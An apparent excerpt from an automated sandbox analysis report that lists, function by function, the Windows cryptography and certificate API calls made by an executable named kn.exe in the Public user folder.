      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A0DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,6_2_00007FF67C5A0DB8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550DD4 NCryptGetProperty,#205,#359,#357,#359,#357,6_2_00007FF67C550DD4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C578DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,6_2_00007FF67C578DD0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F0E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,6_2_00007FF67C4F0E94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586EA8 NCryptImportKey,#360,6_2_00007FF67C586EA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C522E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF67C522E7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57EE94 CryptSignMessage,SetLastError,6_2_00007FF67C57EE94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C594E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,6_2_00007FF67C594E58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C552E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,6_2_00007FF67C552E6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586E48 NCryptSetProperty,#360,6_2_00007FF67C586E48
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586F2C NCryptExportKey,#360,6_2_00007FF67C586F2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E8F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,6_2_00007FF67C4E8F1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF67C550EF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B0ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,6_2_00007FF67C5B0ED0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E4F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,6_2_00007FF67C4E4F90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586FAC BCryptOpenAlgorithmProvider,#360,6_2_00007FF67C586FAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550FB4 NCryptOpenKey,#205,#359,#357,#357,6_2_00007FF67C550FB4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C540F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF67C540F58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,6_2_00007FF67C57EF74
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C534F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF67C534F50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C55301C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C557020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C557020
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C549028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,6_2_00007FF67C549028
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF67C4C302F
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C7034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,6_2_00007FF67C4C7034
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58700C BCryptEnumAlgorithms,#360,6_2_00007FF67C58700C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,6_2_00007FF67C51B098
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C55B0A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,6_2_00007FF67C4F107C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58705C BCryptGetProperty,#360,6_2_00007FF67C58705C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C551058 NCryptOpenStorageProvider,#205,#359,#357,6_2_00007FF67C551058
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF67C57511C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587124 BCryptGenerateKeyPair,#360,6_2_00007FF67C587124
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C509134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,6_2_00007FF67C509134
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5510D8 NCryptSetProperty,#205,#359,#357,#359,#357,6_2_00007FF67C5510D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5530D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF67C5530D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5870C8 BCryptSetProperty,#360,6_2_00007FF67C5870C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55099C BCryptOpenAlgorithmProvider,#205,#359,#359,6_2_00007FF67C55099C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5129A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF67C5129A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C582994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF67C582994
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C558940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,6_2_00007FF67C558940
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF67C55C940
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DC960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF67C4DC960
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C554A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,6_2_00007FF67C554A1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550A18 BCryptSetProperty,#205,#359,#357,#357,6_2_00007FF67C550A18
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C534A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,6_2_00007FF67C534A34
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,6_2_00007FF67C53AA00
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C58A9F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,6_2_00007FF67C51E9F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C558AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C558AA0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C6A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,6_2_00007FF67C4C6A84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C582A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,6_2_00007FF67C582A78
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF67C53EA7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F2B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,6_2_00007FF67C4F2B00
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C548AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF67C548AFC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C552AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,6_2_00007FF67C552AE4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550ABC BCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF67C550ABC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C580B9C CryptHashData,GetLastError,#357,6_2_00007FF67C580B9C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,6_2_00007FF67C57CBB4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550B80 NCryptCreatePersistedKey,#205,#359,#359,#357,6_2_00007FF67C550B80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DCB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,6_2_00007FF67C4DCB98
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5BEB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,6_2_00007FF67C5BEB38
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586C30 NCryptOpenStorageProvider,#360,6_2_00007FF67C586C30
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4ECC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,6_2_00007FF67C4ECC24
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C580BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,6_2_00007FF67C580BF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C552BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C552BC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C544CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C544CA0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,6_2_00007FF67C55ACAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C594C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,6_2_00007FF67C594C80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C552C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,6_2_00007FF67C552C80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586C88 NCryptEnumAlgorithms,#360,6_2_00007FF67C586C88
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C588C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF67C588C58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B6C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF67C4B6C4C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550C3C NCryptExportKey,#205,#359,#359,#357,6_2_00007FF67C550C3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C512D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C512D18
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586D2C NCryptFreeBuffer,#360,6_2_00007FF67C586D2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C542CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,6_2_00007FF67C542CF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C552CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,6_2_00007FF67C552CFC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550D14 NCryptFinalizeKey,#205,#357,#357,6_2_00007FF67C550D14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586CE0 NCryptEnumStorageProviders,#360,6_2_00007FF67C586CE0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A8CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,6_2_00007FF67C5A8CF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C514CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,6_2_00007FF67C514CC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5565B4 NCryptIsKeyHandle,_CxxThrowException,6_2_00007FF67C5565B4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,6_2_00007FF67C54E57C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF67C58A590
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5BA58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,6_2_00007FF67C5BA58C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D8600 #357,CryptDecodeObject,GetLastError,LocalFree,6_2_00007FF67C4D8600
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E0630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4E0630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DC5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF67C4DC5D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5125E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF67C5125E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E6694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,6_2_00007FF67C4E6694
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C524694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,6_2_00007FF67C524694
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586654 NCryptGetProperty,#360,6_2_00007FF67C586654
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,6_2_00007FF67C51A654
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C542724 CryptDecodeObject,GetLastError,#357,6_2_00007FF67C542724
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5866D8 NCryptFreeObject,#360,6_2_00007FF67C5866D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5786D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,6_2_00007FF67C5786D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F26E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,6_2_00007FF67C4F26E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5507A4 BCryptDestroyHash,#205,#357,6_2_00007FF67C5507A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C58A740
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550740 BCryptCloseAlgorithmProvider,#205,#357,#357,6_2_00007FF67C550740
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D6824 CryptHashCertificate,GetLastError,#357,6_2_00007FF67C4D6824
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C588814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,6_2_00007FF67C588814
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B67CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4B67CC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF67C53C7F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5507F4 BCryptDestroyKey,#205,#357,6_2_00007FF67C5507F4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5427BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C5427BC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5607D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C5607D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5BE8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,6_2_00007FF67C5BE8B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550844 BCryptExportKey,#205,#359,#357,#357,6_2_00007FF67C550844
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C584914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C584914
